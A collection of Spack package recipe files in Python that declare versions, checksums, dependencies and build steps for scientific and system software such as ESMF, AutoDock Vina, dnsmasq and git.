variant("openmp", default=True, description="Enable OpenMP support")
depends_on("elpa+openmp", when="+openmp")
depends_on("elpa~openmp", when="~openmp")
depends_on("cereal")
depends_on("libxc")
depends_on("fftw")
# MPI is a necessary dependency
depends_on("mpi", type=("build", "link", "run"))
depends_on("mkl")
build_directory = "source"
def edit(self, spec, prefix):
if "+openmp" in spec:
inc_var = "_openmp-"
system_var = (
"ELPA_LIB = -L${ELPA_LIB_DIR} -lelpa_openmp -Wl, -rpath=${ELPA_LIB_DIR}"
)
else:
inc_var = "-"
system_var = (
"ELPA_LIB = -L${ELPA_LIB_DIR} -lelpa -Wl,-rpath=${ELPA_LIB_DIR}"
)
tempInc = (
"\
FORTRAN = ifort\n\
CPLUSPLUS = icpc\n\
CPLUSPLUS_MPI = mpiicpc\n\
LAPACK_DIR = $(MKLROOT)\n\
FFTW_DIR = %s\n\
ELPA_DIR = %s\n\
ELPA_INCLUDE = -I${ELPA_DIR}/include/elpa%s%s\n\
CEREAL_DIR = %s\n\
OBJ_DIR = obj\n\
OBJ_DIR_serial = obj\n\
NP = 14\n"
% (
spec["fftw"].prefix,
spec["elpa"].prefix,
inc_var,
"{0}".format(spec["elpa"].version),
spec["cereal"].prefix,
)
)
with open(self.build_directory + "/Makefile.vars", "w") as f:
f.write(tempInc)
lineList = []
Pattern1 = re.compile("^ELPA_INCLUDE_DIR")
Pattern2 = re.compile("^ELPA_LIB\\s*= ")
with open(self.build_directory + "/Makefile.system", "r") as f:
while True:
line = f.readline()
if not line:
break
elif Pattern1.search(line):
pass
elif Pattern2.search(line):
pass
else:
lineList.append(line)
with open(self.build_directory + "/Makefile.system", "w") as f:
for i in lineList:
f.write(i)
with open(self.build_directory + "/Makefile.system", "a") as f:
f.write(system_var)
def install(self, spec, prefix):
install_tree("bin", prefix.bin)
```
#### File: packages/adms/package.py
```python
from spack.package import *
class Adms(AutotoolsPackage):
"""ADMS is a code generator that converts electrical compact device models
specified in high-level description language into ready-to-compile c code
for the API of spice simulators."""
homepage = "https://sourceforge.net/projects/mot-adms/"
url = "https://github.com/Qucs/ADMS/releases/download/release-2.3.7/adms-2.3.7.tar.gz"
git = "https://github.com/Qucs/ADMS.git"
maintainers = ['cessenat']
version('master', branch='master')
version('2.3.7', sha256='3a78e1283ecdc3f356410474b3ff44c4dcc82cb89772087fd3bbde8a1038ce08')
depends_on('[email protected]:', type='build')
depends_on('flex', type='build')
depends_on('perl-xml-libxml', type='build')
@when('@master')
def autoreconf(self, spec, prefix):
sh = which('sh')
sh('./bootstrap.sh')
```
#### File: packages/authd/package.py
```python
from spack.package import *
class Authd(MakefilePackage):
"""authd is a small and fast RFC 1413 ident protocol daemon with
both xinetd server and interactive modes that supports IPv6 and
IPv4 as well as the more popular features of pidentd."""
homepage = "https://github.com/InfrastructureServices/authd"
url = "https://github.com/InfrastructureServices/authd/releases/download/v1.4.4/authd-1.4.4.tar.gz"
version('1.4.4', sha256='71ee3d1c3e107c93e082148f75ee460c949b203c861dd20d48f7c5cfdc272bf8')
def setup_run_environment(self, env):
env.prepend_path('PATH', self.prefix.sbin)
def install(self, spec, prefix):
make('prefix={0}'.format(prefix), 'install')
```
#### File: packages/autodock-vina/package.py
```python
import sys
from spack.package import *
class AutodockVina(MakefilePackage):
"""AutoDock Vina is an open-source program for doing molecular docking"""
homepage = "http://vina.scripps.edu/"
url = "https://github.com/ccsb-scripps/AutoDock-Vina/archive/refs/tags/v1.2.3.tar.gz"
version('1.2.3', sha256='22f85b2e770b6acc363429153b9551f56e0a0d88d25f747a40d2f55a263608e0')
version('1.2.2', sha256='b9c28df478f90d64dbbb5f4a53972bddffffb017b7bb58581a1a0034fff1b400')
version('1.2.1', sha256='2d8d9871a5a95265c03c621c0584d9f06b202303116e6c87e23c935f7b694f74')
version('1.2.0', sha256='9c9a85766b4d124d7c1d92e767aa8b4580c6175836b8aa2c28f88a9c40a5b90e')
version('1.1.2', sha256='65422b2240c75d40417872a48e98043e7a7c435300dc8490af0c1f752f1ca4a2',
url='https://github.com/ccsb-scripps/AutoDock-Vina/archive/refs/tags/v1.1.2-boost-new.tar.gz')
depends_on('[email protected]:1.75.0 +filesystem +program_options +serialization +system +thread', when='@1.1.2')
depends_on('[email protected]: +filesystem +program_options +serialization +system +thread', when='@1.2.0:')
@property
def build_directory(self):
if sys.platform == "darwin":
return join_path('build', 'mac', 'release')
else:
return join_path('build', 'linux', 'release')
def edit(self, spec, prefix):
with working_dir(self.build_directory):
makefile = FileFilter('Makefile')
makefile.filter('BOOST_INCLUDE = .*', 'BOOST_INCLUDE = %s' %
self.spec['boost'].prefix.include)
makefile.filter('C_PLATFORM=.*', 'C_PLATFORM=-pthread')
makefile.filter('GPP=.*', 'GPP=%s' % spack_cxx)
def build(self, spec, prefix):
with working_dir(self.build_directory):
make()
def install(self, spec, prefix):
with working_dir(self.build_directory):
mkdirp(prefix.bin)
install('vina', prefix.bin)
install('vina_split', prefix.bin)
```
#### File: packages/bamaddrg/package.py
```python
from spack.package import *
class Bamaddrg(MakefilePackage):
"""bamaddrg adds read groups to input BAM files,
streams BAM output on stdout"""
homepage = "https://github.com/ekg/bamaddrg"
url = "https://github.com/ilbiondo/bamaddrg/archive/v0.1.tar.gz"
git = "https://github.com/ilbiondo/bamaddrg.git"
version('0.1', sha256='725a689d8326d72f865837b231005a9211d6c70a25b7a3a754df4f90d2996355')
depends_on("bamtools", type="build")
def setup_build_environment(self, env):
env.set('BAMTOOLS_ROOT', self.spec['bamtools'].prefix)
env.set('PREFIX', self.prefix)
```
#### File: packages/bricks/package.py
```python
from spack import *
class Bricks(CMakePackage):
"""Bricks is a data layout and code generation framework,
enabling performance-portable stencil computations across
a multitude of architectures."""
# url for your package's homepage here.
homepage = "https://bricks.run/"
git = 'https://github.com/CtopCsUtahEdu/bricklib.git'
test_requires_compiler = True
# List of GitHub accounts to notify when the package is updated.
maintainers = ['ztuowen', 'drhansj']
version('r0.1', branch='r0.1')
variant('cuda', default=False, description='Build bricks with CUDA enabled')
# Building a variant of cmake without openssl is to match how the
# ECP E4S project builds cmake in their e4s-base-cuda Docker image
depends_on('cmake', type='build')
depends_on('autoconf', type='build')
depends_on('automake', type='build')
depends_on('libtool', type='build')
depends_on('opencl-clhpp', when='+cuda')
depends_on('cuda', when='+cuda')
depends_on('mpi')
def cmake_args(self):
"""CMake arguments for configure stage"""
args = []
return args
def flag_handler(self, name, flags):
"""Set build flags as needed"""
if name in ['cflags', 'cxxflags', 'cppflags']:
# There are many vector instrinsics used in this package. If
# the package is built on a native architecture, then it likely
# will not run (illegal instruction fault) on a less feature-
# rich architecture.
# If you intend to use this package in an architecturally-
# heterogeneous environment, then the package should be build
# with "target=x86_64". This will ensure that all Intel
# architectures can use the libraries and tests in this
# project by forceing the AVX2 flag in gcc.
if name == 'cxxflags' and self.spec.target == 'x86_64':
flags.append('-mavx2')
return (None, flags, None)
return(flags, None, None)
@run_after('install')
def copy_test_sources(self):
"""Files to copy into test cache"""
srcs = [join_path('examples', 'external', 'CMakeLists.txt'),
join_path('examples', 'external', 'main.cpp'),
join_path('examples', 'external', '7pt.py')]
self.cache_extra_test_sources(srcs)
def test(self):
"""Test bricklib package"""
# Test prebuilt binary
source_dir = join_path(self.test_suite.current_test_cache_dir,
'examples', 'external')
self.run_test(exe='cmake',
options=['.'],
purpose='Configure bricklib example',
work_dir=source_dir)
self.run_test(exe='cmake',
options=['--build', '.'],
purpose='Build bricklib example',
work_dir=source_dir)
self.run_test(exe=join_path(source_dir, 'example'),
options=[],
purpose='Execute bricklib example',
work_dir=source_dir)
```
#### File: packages/cni-plugins/package.py
```python
from spack.package import *
class CniPlugins(Package):
"""Standard networking plugins for container networking"""
homepage = 'https://github.com/containernetworking/plugins'
url = 'https://github.com/containernetworking/plugins/archive/v1.0.1.tar.gz'
maintainers = ['bernhardkaindl']
version('1.0.1', sha256='2ba3cd9f341a7190885b60d363f6f23c6d20d975a7a0ab579dd516f8c6117619')
depends_on('go', type='build')
def install(self, spec, prefix):
utils = 'github.com/containernetworking/plugins/pkg/utils/buildversion'
which('./build_linux.sh')(
'-ldflags',
'-extldflags -static -X {0}.BuildVersion={1}'.format(utils, self.version),
)
install_tree('bin', prefix.bin)
```
#### File: packages/cray-libsci/package.py
```python
from spack.package import *
from spack.util.module_cmd import get_path_args_from_module_line, module
class CrayLibsci(Package):
"""The Cray Scientific Libraries package, LibSci, is a collection of
numerical routines optimized for best performance on Cray systems."""
homepage = "https://docs.nersc.gov/development/libraries/libsci/"
has_code = False # Skip attempts to fetch source that is not available
version("21.08.1.2")
version("20.06.1")
version("20.03.1")
version("19.06.1")
version("18.12.1")
version("18.11.1.2")
version("16.11.1")
version("16.09.1")
version('16.07.1')
version("16.06.1")
version("16.03.1")
variant("shared", default=True, description="enable shared libs")
variant("openmp", default=False, description="link with openmp")
variant("mpi", default=False, description="link with mpi libs")
provides("blas")
provides("lapack")
provides("scalapack", when="+mpi")
canonical_names = {
'gcc': 'GNU',
'cce': 'CRAY',
'intel': 'INTEL',
'clang': 'ALLINEA',
'aocc': 'AOCC',
'nvhpc': 'NVIDIA',
'rocmcc': 'AMD'
}
@property
def modname(self):
return "cray-libsci/{0}".format(self.version)
@property
def external_prefix(self):
libsci_module = module("show", self.modname).splitlines()
for line in libsci_module:
if "CRAY_LIBSCI_PREFIX_DIR" in line:
return get_path_args_from_module_line(line)[0]
@property
def blas_libs(self):
shared = True if "+shared" in self.spec else False
compiler = self.spec.compiler.name
lib = []
if "+openmp" in self.spec and "+mpi" in self.spec:
lib = ["libsci_{0}_mpi_mp", "libsci_{0}_mp"]
elif "+openmp" in self.spec:
lib = ["libsci_{0}_mp"]
elif "+mpi" in self.spec:
lib = ["libsci_{0}_mpi", "libsci_{0}"]
else:
lib = ["libsci_{0}"]
libname = []
for lib_fmt in lib:
libname.append(lib_fmt.format(self.canonical_names[compiler].lower()))
return find_libraries(
libname,
root=self.prefix.lib,
shared=shared,
recursive=False)
@property
def lapack_libs(self):
return self.blas_libs
@property
def scalapack_libs(self):
return self.blas_libs
@property
def libs(self):
return self.blas_libs
def install(self, spec, prefix):
raise InstallError(
self.spec.format('{name} is not installable, you need to specify '
'it as an external package in packages.yaml'))
```
#### File: packages/cray-pmi/package.py
```python
from spack.package import *
class CrayPmi(Package):
"""Cray's Process Management Interface library"""
homepage = "https://docs.nersc.gov/development/compilers/wrappers/"
has_code = False # Skip attempts to fetch source that is not available
maintainers = ['haampie']
version('5.0.17')
version('5.0.16')
version('5.0.11')
@property
def headers(self):
return find_headers('pmi', self.prefix.include, recursive=True)
@property
def libs(self):
return find_libraries(['libpmi'], root=self.prefix, recursive=True)
```
#### File: packages/dnsmasq/package.py
```python
from spack.package import *
class Dnsmasq(MakefilePackage):
"""A lightweight, caching DNS proxy with integrated DHCP server."""
homepage = "https://www.thekelleys.org.uk/dnsmasq/doc.html"
url = "http://www.thekelleys.org.uk/dnsmasq/dnsmasq-2.70.tar.gz"
version('2.81', sha256='3c28c68c6c2967c3a96e9b432c0c046a5df17a426d3a43cffe9e693cf05804d0')
version('2.80', sha256='9e4a58f816ce0033ce383c549b7d4058ad9b823968d352d2b76614f83ea39adc')
version('2.79', sha256='77512dd6f31ffd96718e8dcbbf54f02c083f051d4cca709bd32540aea269f789')
version('2.78', sha256='c92e5d78aa6353354d02aabf74590d08980bb1385d8a00b80ef9bc80430aa1dc')
version('2.77', sha256='ae97a68c4e64f07633f31249eb03190d673bdb444a05796a3a2d3f521bfe9d38')
version('2.76', sha256='777c4762d2fee3738a0380401f2d087b47faa41db2317c60660d69ad10a76c32')
version('2.75', sha256='f8252c0a0ba162c2cd45f81140c7c17cc40a5fca2b869d1a420835b74acad294')
version('2.74', sha256='27b95a8b933d7eb88e93a4c405b808d09268246d4e108606e423ac518aede78f')
version('2.73', sha256='9f350f74ae2c7990b1c7c6c8591d274c37b674aa987f54dfee7ca856fae0d02d')
version('2.72', sha256='635f1b47417d17cf32e45cfcfd0213ac39fd09918479a25373ba9b2ce4adc05d')
version('2.71', sha256='7d8c64f66a396442e01b639df3ea6b4e02ba88cbe206c80be8de68b6841634c4')
version('2.70', sha256='8eb7bf53688d6aaede5c90cfd2afcce04803a4efbddfbeecc6297180749e98af')
def install(self, spec, prefix):
mkdirp(prefix.bin)
install('./src/dnsmasq', prefix.bin)
```
#### File: packages/ds/package.py
```python
from os import symlink
from spack.package import *
class Ds(AutotoolsPackage):
"""SAOImage DS9 is an astronomical imaging and data visualization
application."""
homepage = "https://ds9.si.edu/"
url = "http://ds9.si.edu/download/source/ds9.8.0.tar.gz"
version('9.8.0', sha256='f3bdb46c1653997202f98c6f76632a4eb444707f4b64c14f8b96863d9c890304')
depends_on('autoconf', type='build')
depends_on('automake', type='build')
depends_on('m4', type='build')
depends_on('libtool', type='build')
depends_on('libx11')
depends_on('libxml2')
depends_on('libxslt')
depends_on('openssl')
depends_on('tcl')
depends_on('tcl-tclxml')
depends_on('tk')
def patch(self):
# the package provides it's own TCL utilities
# compiling and manually setting paths for all of them is contrived
# (most of the utilities are small and not included in spack)
# inject libxml, libxslt prefixes into configure search paths
filter_file('/usr/bin/xml2-config',
join_path(self.spec['libxml2'].prefix, 'bin/xml2-config'),
'tclxml/configure', string=True)
filter_file('/usr/bin/xslt-config',
join_path(self.spec['libxslt'].prefix, 'bin/xslt-config'),
'tclxml/configure', string=True)
# symlink the master configure script into the source directory
symlink('unix/configure', 'configure')
def configure_args(self):
srcdir = join_path(self.stage.source_path, 'unix')
return ['--srcdir={0}'.format(srcdir)]
def install(self, spec, prefix):
# no install target provided in Makefile, install manually
install_tree('bin', prefix.bin)
install_tree('share', prefix.share)
install_tree('lib', prefix.lib)
```
#### File: packages/dsrc/package.py
```python
from spack.package import *
class Dsrc(MakefilePackage):
"""DNA Sequence Reads Compression is an application designed for
compression of data files containing reads from DNA sequencing in
FASTQ format."""
homepage = "http://sun.aei.polsl.pl/dsrc"
url = "https://github.com/refresh-bio/DSRC/archive/v2.0.2.tar.gz"
version('2.0.2', sha256='6d7abe0d72a501054a2115ccafff2e85e6383de627ec3e94ff4f03b7bb96a806')
parallel = False
def install(self, spec, prefix):
install_tree('bin', prefix.bin)
install_tree('lib', prefix.lib)
install_tree('include', prefix.include)
install_tree('examples', prefix.examples)
```
#### File: packages/esmf/package.py
```python
import os
from spack.package import *
class Esmf(MakefilePackage):
"""The Earth System Modeling Framework (ESMF) is high-performance, flexible
software infrastructure for building and coupling weather, climate, and
related Earth science applications. The ESMF defines an architecture for
composing complex, coupled modeling systems and includes data structures
and utilities for developing individual models."""
homepage = "https://www.earthsystemcog.org/projects/esmf/"
url = 'https://github.com/esmf-org/esmf/archive/ESMF_8_0_1.tar.gz'
maintainers = ['climbfuji']
version('8.2.0', sha256='3693987aba2c8ae8af67a0e222bea4099a48afe09b8d3d334106f9d7fc311485')
version('8.1.1', sha256='58c2e739356f21a1b32673aa17a713d3c4af9d45d572f4ba9168c357d586dc75')
version('8.0.1', sha256='9172fb73f3fe95c8188d889ee72fdadb4f978b1d969e1d8e401e8d106def1d84')
version('8.0.0', sha256='051dca45f9803d7e415c0ea146df15ce487fb55f0fce18ca61d96d4dba0c8774')
version('7.1.0r', sha256='<KEY>')
variant('mpi', default=True, description='Build with MPI support')
variant('external-lapack', default=False, description='Build with external LAPACK support')
variant('netcdf', default=True, description='Build with NetCDF support')
variant('pnetcdf', default=True, description='Build with pNetCDF support')
variant('xerces', default=True, description='Build with Xerces support')
variant('pio', default=True, description='Enable ParallelIO support')
variant('debug', default=False, description='Make a debuggable version of the library')
# Required dependencies
depends_on('zlib')
depends_on('libxml2')
# Optional dependencies
depends_on('mpi', when='+mpi')
depends_on('lapack@3:', when='+external-lapack')
depends_on('[email protected]:', when='+netcdf')
depends_on('[email protected]:', when='+netcdf')
depends_on('[email protected]:', when='+pnetcdf')
depends_on('[email protected]:', when='+xerces')
# Testing dependencies
depends_on('perl', type='test')
# Make esmf build with newer intel versions
patch('intel.patch', when='@:7.0 %intel@17:')
# Make esmf build with newer gcc versions
# https://sourceforge.net/p/esmf/esmf/ci/3706bf758012daebadef83d6575c477aeff9c89b/
patch('gcc.patch', when='@:7.0 %gcc@6:')
# Fix undefined reference errors with mvapich2
# https://sourceforge.net/p/esmf/esmf/ci/34de0ccf556ba75d35c9687dae5d9f666a1b2a18/
patch('mvapich2.patch', when='@:7.0')
# Allow different directories for creation and
# installation of dynamic libraries on OSX:
patch('darwin_dylib_install_name.patch', when='platform=darwin @:7.0')
# Missing include file for newer gcc compilers
# https://trac.macports.org/ticket/57493
patch('cstddef.patch', when='@7.1.0r %gcc@8:')
# Make script from mvapich2.patch executable
@when('@:7.0')
@run_before('build')
def chmod_scripts(self):
chmod = which('chmod')
chmod('+x', 'scripts/libs.mvapich2f90')
def url_for_version(self, version):
if version < Version('8.0.0'):
return "http://www.earthsystemmodeling.org/esmf_releases/public/ESMF_{0}/esmf_{0}_src.tar.gz".format(version.underscored)
else:
return "https://github.com/esmf-org/esmf/archive/ESMF_{0}.tar.gz".format(version.underscored)
def edit(self, spec, prefix):
# Installation instructions can be found at:
# http://www.earthsystemmodeling.org/esmf_releases/last_built/ESMF_usrdoc/node9.html
# Unset any environment variables that may influence the installation.
for var in os.environ:
if var.startswith('ESMF_'):
os.environ.pop(var)
######################################
# Build and Installation Directories #
######################################
# The environment variable ESMF_DIR must be set to the full pathname
# of the top level ESMF directory before building the framework.
os.environ['ESMF_DIR'] = os.getcwd()
# This variable specifies the prefix of the installation path used
# with the install target.
os.environ['ESMF_INSTALL_PREFIX'] = prefix
# Installation subdirectories default to:
# bin/binO/Linux.gfortran.64.default.default
os.environ['ESMF_INSTALL_BINDIR'] = 'bin'
os.environ['ESMF_INSTALL_LIBDIR'] = 'lib'
os.environ['ESMF_INSTALL_MODDIR'] = 'include'
# Allow compiler flags to carry through from compiler spec
os.environ['ESMF_CXXCOMPILEOPTS'] = \
' '.join(spec.compiler_flags['cxxflags'])
os.environ['ESMF_F90COMPILEOPTS'] = \
' '.join(spec.compiler_flags['fflags'])
# ESMF will simply not build with Intel using backing GCC 8, in that
# case you need to point to something older, below is commented but is
# an example
# os.environ['ESMF_CXXCOMPILEOPTS'] = \
# '-O2 -std=c++11 -gcc-name=/usr/bin/gcc'
# os.environ['ESMF_F90COMPILEOPTS'] = \
# '-O2 -gcc-name=/usr/bin/gcc'
############
# Compiler #
############
# ESMF_COMPILER must be set to select which Fortran and
# C++ compilers are being used to build the ESMF library.
if self.compiler.name == 'gcc':
os.environ['ESMF_COMPILER'] = 'gfortran'
gfortran_major_version = int(spack.compiler.get_compiler_version_output(
self.compiler.fc, '-dumpversion').split('.')[0])
elif self.compiler.name == 'intel':
os.environ['ESMF_COMPILER'] = 'intel'
elif self.compiler.name in ['clang', 'apple-clang']:
os.environ['ESMF_COMPILER'] = 'gfortranclang'
gfortran_major_version = int(spack.compiler.get_compiler_version_output(
self.compiler.fc, '-dumpversion').split('.')[0])
elif self.compiler.name == 'nag':
os.environ['ESMF_COMPILER'] = 'nag'
elif self.compiler.name == 'pgi':
os.environ['ESMF_COMPILER'] = 'pgi'
else:
msg = "The compiler you are building with, "
msg += "'{0}', is not supported by ESMF."
raise InstallError(msg.format(self.compiler.name))
if '+mpi' in spec:
os.environ['ESMF_CXX'] = spec['mpi'].mpicxx
os.environ['ESMF_F90'] = spec['mpi'].mpifc
else:
os.environ['ESMF_CXX'] = os.environ['CXX']
os.environ['ESMF_F90'] = os.environ['FC']
# This environment variable controls the build option.
if '+debug' in spec:
# Build a debuggable version of the library.
os.environ['ESMF_BOPT'] = 'g'
else:
# Build an optimized version of the library.
os.environ['ESMF_BOPT'] = 'O'
if self.compiler.name in ['gcc', 'clang', 'apple-clang'] and \
gfortran_major_version >= 10:
os.environ['ESMF_F90COMPILEOPTS'] = '-fallow-argument-mismatch'
#######
# OS #
#######
# ESMF_OS must be set for Cray systems
if 'platform=cray' in self.spec:
os.environ['ESMF_OS'] = 'Unicos'
#######
# MPI #
#######
# ESMF_COMM must be set to indicate which MPI implementation
# is used to build the ESMF library.
if '+mpi' in spec:
if 'platform=cray' in self.spec:
os.environ['ESMF_COMM'] = 'mpi'
elif '^mvapich2' in spec:
os.environ['ESMF_COMM'] = 'mvapich2'
elif '^mpich' in spec:
# [email protected] does not include configs for mpich3,
# so we start with the configs for mpich2:
os.environ['ESMF_COMM'] = 'mpich2'
# The mpich 3 series split apart the Fortran and C bindings,
# so we link the Fortran libraries when building C programs:
os.environ['ESMF_CXXLINKLIBS'] = '-lmpifort'
elif '^openmpi' in spec or \
'^hpcx-mpi' in spec:
os.environ['ESMF_COMM'] = 'openmpi'
elif '^intel-parallel-studio+mpi' in spec or \
'^intel-mpi' in spec or \
'^intel-oneapi-mpi' in spec:
os.environ['ESMF_COMM'] = 'intelmpi'
else:
# Force use of the single-processor MPI-bypass library.
os.environ['ESMF_COMM'] = 'mpiuni'
##########
# LAPACK #
##########
if '+external-lapack' in spec:
# A system-dependent external LAPACK/BLAS installation is used
# to satisfy the external dependencies of the LAPACK-dependent
# ESMF code.
os.environ['ESMF_LAPACK'] = 'system'
# FIXME: determine whether or not we need to set this
# Specifies the path where the LAPACK library is located.
# os.environ['ESMF_LAPACK_LIBPATH'] = spec['lapack'].prefix.lib
# Specifies the linker directive needed to link the LAPACK library
# to the application.
os.environ['ESMF_LAPACK_LIBS'] = spec['lapack'].libs.link_flags # noqa
else:
os.environ['ESMF_LAPACK'] = 'internal'
##########
# NetCDF #
##########
if '+netcdf' in spec:
# ESMF provides the ability to read Grid and Mesh data in
# NetCDF format.
if spec.satisfies('^[email protected]:'):
# ESMF_NETCDF_LIBS will be set to "-lnetcdff -lnetcdf".
# This option is useful for systems which have the Fortran
# and C bindings archived in seperate library files.
os.environ['ESMF_NETCDF'] = 'split'
else:
# ESMF_NETCDF_LIBS will be set to "-lnetcdf".
# This option is useful when the Fortran and C bindings
# are archived together in the same library file.
os.environ['ESMF_NETCDF'] = 'standard'
# FIXME: determine whether or not we need to set these.
# ESMF_NETCDF_INCLUDE
# ESMF_NETCDF_LIBPATH
###################
# Parallel-NetCDF #
###################
if '+pnetcdf' in spec:
# ESMF provides the ability to write Mesh weights
# using Parallel-NetCDF.
# When defined, enables the use of Parallel-NetCDF.
# ESMF_PNETCDF_LIBS will be set to "-lpnetcdf".
os.environ['ESMF_PNETCDF'] = 'standard'
# FIXME: determine whether or not we need to set these.
# ESMF_PNETCDF_INCLUDE
# ESMF_PNETCDF_LIBPATH
##############
# ParallelIO #
##############
if '+pio' in spec and '+mpi' in spec:
# ESMF provides the ability to read and write data in both binary
# and NetCDF formats through ParallelIO (PIO), a third-party IO
# software library that is integrated in the ESMF library.
# PIO-dependent features will be enabled and will use the
# PIO library that is included and built with ESMF.
os.environ['ESMF_PIO'] = 'internal'
else:
# Disables PIO-dependent code.
os.environ['ESMF_PIO'] = 'OFF'
##########
# XERCES #
##########
if '+xerces' in spec:
# ESMF provides the ability to read Attribute data in
# XML file format via the XERCES C++ library.
# ESMF_XERCES_LIBS will be set to "-lxerces-c".
os.environ['ESMF_XERCES'] = 'standard'
# FIXME: determine if the following are needed
# ESMF_XERCES_INCLUDE
# ESMF_XERCES_LIBPATH
def check(self):
make('check', parallel=False)
def setup_dependent_build_environment(self, env, dependent_spec):
env.set('ESMFMKFILE', os.path.join(self.prefix.lib, 'esmf.mk'))
def setup_run_environment(self, env):
env.set('ESMFMKFILE', os.path.join(self.prefix.lib, 'esmf.mk'))
```
#### File: packages/flint/package.py
```python
from spack.package import *
class Flint(Package):
"""FLINT (Fast Library for Number Theory)."""
homepage = "https://www.flintlib.org"
url = "https://mirrors.mit.edu/sage/spkg/upstream/flint/flint-2.5.2.tar.gz"
git = "https://github.com/wbhart/flint2.git"
version('develop', branch='trunk')
version('2.5.2', sha256='cbf1fe0034533c53c5c41761017065f85207a1b770483e98b2392315f6575e87')
version('2.4.5', sha256='e489354df00f0d84976ccdd0477028693977c87ccd14f3924a89f848bb0e01e3')
# Overlap in functionality between gmp and mpir
# All other dependencies must also be built with
# one or the other
# variant('mpir', default=False,
# description='Compile with the MPIR library')
# Build dependencies
depends_on('autoconf', type='build')
# Other dependencies
depends_on('gmp') # mpir is a drop-in replacement for this
depends_on('mpfr') # Could also be built against mpir
def install(self, spec, prefix):
options = []
options = ["--prefix=%s" % prefix,
"--with-gmp=%s" % spec['gmp'].prefix,
"--with-mpfr=%s" % spec['mpfr'].prefix]
# if '+mpir' in spec:
# options.extend([
# "--with-mpir=%s" % spec['mpir'].prefix
# ])
configure(*options)
make()
if self.run_tests:
make("check")
make("install")
```
#### File: packages/gblocks/package.py
```python
from spack.package import *
class Gblocks(Package):
"""Gblocks is a computer program written in ANSI C language that eliminates
poorly aligned positions and divergent regions of an alignment of DNA or
protein sequences"""
homepage = "http://molevol.cmima.csic.es/castresana/Gblocks.html"
url = "http://molevol.cmima.csic.es/castresana/Gblocks/Gblocks_Linux64_0.91b.tar.Z"
version('0.91b', sha256='563658f03cc5e76234a8aa705bdc149398defec813d3a0c172b5f94c06c880dc')
def install(self, spec, prefix):
mkdirp(prefix.bin)
install('Gblocks', prefix.bin)
```
#### File: packages/git/package.py
```python
import os
import re
from spack.package import *
class Git(AutotoolsPackage):
"""Git is a free and open source distributed version control
system designed to handle everything from small to very large
projects with speed and efficiency.
"""
homepage = "http://git-scm.com"
url = "https://mirrors.edge.kernel.org/pub/software/scm/git/git-2.12.0.tar.gz"
maintainers = ['jennfshr']
tags = ['build-tools']
executables = ['^git$']
# Every new git release comes with a corresponding manpage resource:
# https://www.kernel.org/pub/software/scm/git/git-manpages-{version}.tar.gz
# https://mirrors.edge.kernel.org/pub/software/scm/git/sha256sums.asc
version('2.36.1', sha256='37d936fd17c81aa9ddd3dba4e56e88a45fa534ad0ba946454e8ce818760c6a2c')
version('2.35.2', sha256='0decc02a47e792f522df3183c38a61ad8fbb38927502ca6781467a6599a888cb')
version('2.35.1', sha256='9845a37dd01f9faaa7d8aa2078399d3aea91b43819a5efea6e2877b0af09bd43', deprecated=True)
version('2.35.0', sha256='c1d0adc777a457a3d9b2759024f173b34e61be96f7480ac5bc44216617834412', deprecated=True)
version('2.34.1', sha256='fc4eb5ecb9299db91cdd156c06cdeb41833f53adc5631ddf8c0cb13eaa2911c1', deprecated=True)
version('2.34.0', sha256='0ce6222bfd31938b29360150286b51c77c643fa97740b1d35b6d1ceef8b0ecd7', deprecated=True)
version('2.33.1', sha256='02047f8dc8934d57ff5e02aadd8a2fe8e0bcf94a7158da375e48086cc46fce1d', deprecated=True)
version('2.33.0', sha256='02d909d0bba560d3a1008bd00dd577621ffb57401b09175fab2bf6da0e9704ae', deprecated=True)
version('2.32.0', sha256='6038f06d396ba9dab2eee541c7db6e7f9f847f181ec62f3d8441893f8c469398', deprecated=True)
version('2.31.1', sha256='46d37c229e9d786510e0c53b60065704ce92d5aedc16f2c5111e3ed35093bfa7', deprecated=True)
version('2.31.0', sha256='bc6168777883562569144d536e8a855b12d25d46870d95188a3064260d7784ee', deprecated=True)
version('2.30.1', sha256='23a3e53f0d2dd3e62a8147b24a1a91d6ffe95b92123ef4dbae04e9a6205e71c0', deprecated=True)
version('2.30.0', sha256='d24c4fa2a658318c2e66e25ab67cc30038a35696d2d39e6b12ceccf024de1e5e', deprecated=True)
version('2.29.2', sha256='869a121e1d75e4c28213df03d204156a17f02fce2dc77be9795b327830f54195', deprecated=True)
version('2.29.0', sha256='fa08dc8424ef80c0f9bf307877f9e2e49f1a6049e873530d6747c2be770742ff', deprecated=True)
version('2.28.0', sha256='f914c60a874d466c1e18467c864a910dd4ea22281ba6d4d58077cb0c3f115170', deprecated=True)
version('2.27.0', sha256='77ded85cbe42b1ffdc2578b460a1ef5d23bcbc6683eabcafbb0d394dffe2e787', deprecated=True)
version('2.26.0', sha256='aa168c2318e7187cd295a645f7370cc6d71a324aafc932f80f00c780b6a26bed', deprecated=True)
version('2.25.0', sha256='a98c9b96d91544b130f13bf846ff080dda2867e77fe08700b793ab14ba5346f6', deprecated=True)
version('2.23.0', sha256='e3396c90888111a01bf607346db09b0fbf49a95bc83faf9506b61195936f0cfe', deprecated=True)
version('2.22.0', sha256='a4b7e4365bee43caa12a38d646d2c93743d755d1cea5eab448ffb40906c9da0b', deprecated=True)
version('2.21.0', sha256='85eca51c7404da75e353eba587f87fea9481ba41e162206a6f70ad8118147bee', deprecated=True)
version('2.20.1', sha256='edc3bc1495b69179ba4e272e97eff93334a20decb1d8db6ec3c19c16417738fd', deprecated=True)
version('2.19.2', sha256='db893ad69c9ac9498b09677c5839787eba2eb3b7ef2bc30bfba7e62e77cf7850', deprecated=True)
version('2.19.1', sha256='ec4dc96456612c65bf6d944cee9ac640145ec7245376832b781cb03e97cbb796', deprecated=True)
version('2.18.0', sha256='94faf2c0b02a7920b0b46f4961d8e9cad08e81418614102898a55f980fa3e7e4', deprecated=True)
version('2.17.1', sha256='ec6452f0c8d5c1f3bcceabd7070b8a8a5eea11d4e2a04955c139b5065fd7d09a', deprecated=True)
version('2.17.0', sha256='7a0cff35dbb14b77dca6924c33ac9fe510b9de35d5267172490af548ec5ee1b8', deprecated=True)
version('2.15.1', sha256='85fca8781a83c96ba6db384cc1aa6a5ee1e344746bafac1cbe1f0fe6d1109c84', deprecated=True)
version('2.14.1', sha256='01925349b9683940e53a621ee48dd9d9ac3f9e59c079806b58321c2cf85a4464', deprecated=True)
version('2.13.0', sha256='9f2fa8040ebafc0c2caae4a9e2cb385c6f16c0525bcb0fbd84938bc796372e80', deprecated=True)
version('2.12.2', sha256='d9c6d787a24670d7e5100db2367c250ad9756ef8084fb153a46b82f1d186f8d8', deprecated=True)
